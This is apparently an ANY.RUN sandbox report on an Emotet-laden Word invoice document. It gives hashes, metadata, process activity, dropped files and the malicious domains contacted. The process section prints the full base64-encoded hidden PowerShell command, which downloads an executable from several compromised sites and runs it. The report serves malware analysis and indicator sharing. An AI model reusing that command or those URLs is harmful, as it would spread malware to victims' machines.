analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

INVOICE_RI068_6764.doc

Full analysis: https://app.any.run/tasks/6bec33e3-0be9-4eaf-a291-6bd0c715bd7e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 17, 2020, 23:09:45
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Et., Author: Mohamed Fleury, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 13 18:12:00 2020, Last Saved Time/Date: Mon Jan 13 18:12:00 2020, Number of Pages: 2, Number of Words: 4, Number of Characters: 29, Security: 0
MD5:

D46ED81A80186FEA39D4AAC63C84B74C

SHA1:

16B39BC743AA6DFC8B91FAEF57D6DE0FEBCF8498

SHA256:

8C897B7353C00E97DC8688E4539DEA9EEBCB05A00BC2B0CFB73CAF5BFAB18D88

SSDEEP:

6144:x0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+ARyRiEu:x0E3dxtR/iU9mvUPliEu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3888)
    • Creates files in the user directory

      • powershell.exe (PID: 3888)
    • Executed via WMI

      • powershell.exe (PID: 3888)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2528)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2528)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3888)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: Et.
Subject: -
Author: Mohamed Fleury
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:01:13 18:12:00
ModifyDate: 2020:01:13 18:12:00
Pages: 2
Words: 4
Characters: 29
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 32
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2528"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INVOICE_RI068_6764.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3888powershell -w hidden -en JABCAHYAawB3AGEAeQB2AG8AeAA9ACcASgB5AHoAcwB4AG0AcQBvAGEAYwAnADsAJABQAGsAeQB2AHYAcQBnAHoAeQBlAHYAIAA9ACAAJwA4ADEANwAnADsAJABZAHUAcwBrAHkAZABkAHMAPQAnAEwAdgBrAGMAaAB4AGwAegAnADsAJABPAHMAagBtAHIAdgB6AGkAdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUABrAHkAdgB2AHEAZwB6AHkAZQB2ACsAJwAuAGUAeABlACcAOwAkAE8AbAB4AHIAbgBiAGwAbwBoAHcAPQAnAFgAaQB4AGcAZwBrAHEAdQB5ACcAOwAkAEcAZAB5AG0AZQBsAHAAcQA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAA7ACQATQB6AGoAeQBiAGkAbABrAHQAbQA9ACcAaAB0AHQAcAA6AC8ALwBrAGEAbQBlAGwAZABpAGcAaQB0AGEAbAAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8ATwBEAE4AQQBiAEcAeQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHkAbwB1AGcAZQBuAGkAdQBzAGEAZABzAC4AYwBvAG0ALwB0AG0AcAAvADIANAAzADEALQA4ADIAbAA0AGIANQAtADcAMQA3ADMANwAyADgAMQAvACoAaAB0AHQAcABzADoALwAvAGUAeABwAHIAZQBzAG8AZABlAHAAbwByAHQAaQB2AG8ALgBjAG8AbQAvAGIAYQBjAGsAdQBwAC8ANAB4AGcANQA3ADkAOQBtAC0AdgBpADAAcgB6AGIAaAB2AGIAOQAtADkANgAvACoAaAB0AHQAcABzADoALwAvAHQAaABlAGIAZQBuAGUAZgBpAHQAcwBoAHUAYgB0AHIAYQBpAG4AaQBuAGcALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBBAHMAagBFAEYATABYAFgALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGgAbwBwAGEAbABlAHQAdABhAC4AYwBvAG0ALwBhAHUAZABpAG8ALwBhAHQANAB1AGsALQBiAGkAOQBqADcALQA5ADcANQA3ADQAMAAvACcALgAiAHMAcABMAGAAaQBUACIAKAAnACoAJwApADsAJABXAG4AdwBtAGsAagByAHAAZABkAHAAPQAnAFcAYQB3AHgAcwBwAGwAegB3AGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEgAcQBrAGkAYQB0AHEAaQByAHgAIABpAG4AIAAkAE0AegBqAHkAYgBpAGwAawB0AG0AKQB7AHQAcgB5AHsAJABHAGQAeQBtAGUAbABwAHEALgAiAGQAbwB3AE4ATABgAE8AQQBEAEYAaQBgAGwAZQAiACgAJABIAHEAawBpAGEAdABxAGkAcgB4ACwAIAAkAE8AcwBqAG0AcgB2AHoAaQB2ACkAOwAkAEUAYQBxAGEAaQB4AGsAeAA9ACcARABxAG8AYgBlAHAAZwBiACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATwBzAGoAbQByAHYAegBpAHYAKQAuACIATABlAG4AZwBgAFQAaAAiACAALQBnAGUAIAAyADIANAA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGEAYABSAHQAIgAoACQATwBzAGoAbQByAHYAegBpAHYAKQA7ACQATABqAGYAbgBzAGMAaQBmAG8AegBqAHkAPQAnAEkAYgBvAHUAZgBlAHEAcAB2ACcAOwBiAHIAZQBhAGsAOwAkAEoAcQBrAHcAcwB2AGIAcABoAD0AJwBLAG0AcQB2AGIAcgBpAGMAdQByAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwByAGgAeABkAGUAdwBvAGoAaABqAGwAeQA9ACcARQBoAGoAZABsAHIAcQBiAGUAagBjAHkAZwAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 033
Read events
1 199
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR990E.tmp.cvr
MD5:
SHA256:
3888powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DOYFCH4DBHM2M1GM4QTV.temp
MD5:
SHA256:
2528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFF221AE5D9ED8B842.TMP
MD5:
SHA256:
2528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF8A9913493D801B4C.TMP
MD5:
SHA256:
2528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFBFB0D2AF8E12AF7C.TMP
MD5:
SHA256:
2528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFC9DFE32ACDC56F48.TMP
MD5:
SHA256:
2528WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{050FF358-5453-4E4A-8B87-60904E04F541}.tmp
MD5:
SHA256:
2528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF2BFCA7DA1662A24C.TMP
MD5:
SHA256:
2528WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{94F77A9A-9E05-4BB5-A025-F57D9935BD67}.tmp
MD5:
SHA256:
2528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$VOICE_RI068_6764.docpgc
MD5:138A589210A92637C07D27450151F7B8
SHA256:854B80A77779192BF474F8AD88A74BC2336C29F50B91A8B89258E62D98213EC5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3888
powershell.exe
GET
404
50.63.202.32:80
http://www.yougeniusads.com/tmp/2431-82l4b5-71737281/
US
xml
345 b
malicious
3888
powershell.exe
GET
404
160.153.209.41:80
http://kameldigital.com/calendar/ODNAbGy/
US
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3888
powershell.exe
66.96.147.193:443
expresodeportivo.com
The Endurance International Group, Inc.
US
malicious
3888
powershell.exe
160.153.209.41:80
kameldigital.com
GoDaddy.com, LLC
US
malicious
3888
powershell.exe
50.63.202.32:80
www.yougeniusads.com
GoDaddy.com, LLC
US
malicious
3888
powershell.exe
192.0.78.188:443
thebenefitshubtraining.com
Automattic, Inc
US
malicious
3888
powershell.exe
101.50.1.41:443
shopaletta.com
PT. Beon Intermedia
ID
malicious

DNS requests

Domain
IP
Reputation
kameldigital.com
  • 160.153.209.41
malicious
www.yougeniusads.com
  • 50.63.202.32
malicious
expresodeportivo.com
  • 66.96.147.193
unknown
thebenefitshubtraining.com
  • 192.0.78.188
  • 192.0.78.231
malicious
shopaletta.com
  • 101.50.1.41
malicious

Threats

No threats detected
No debug info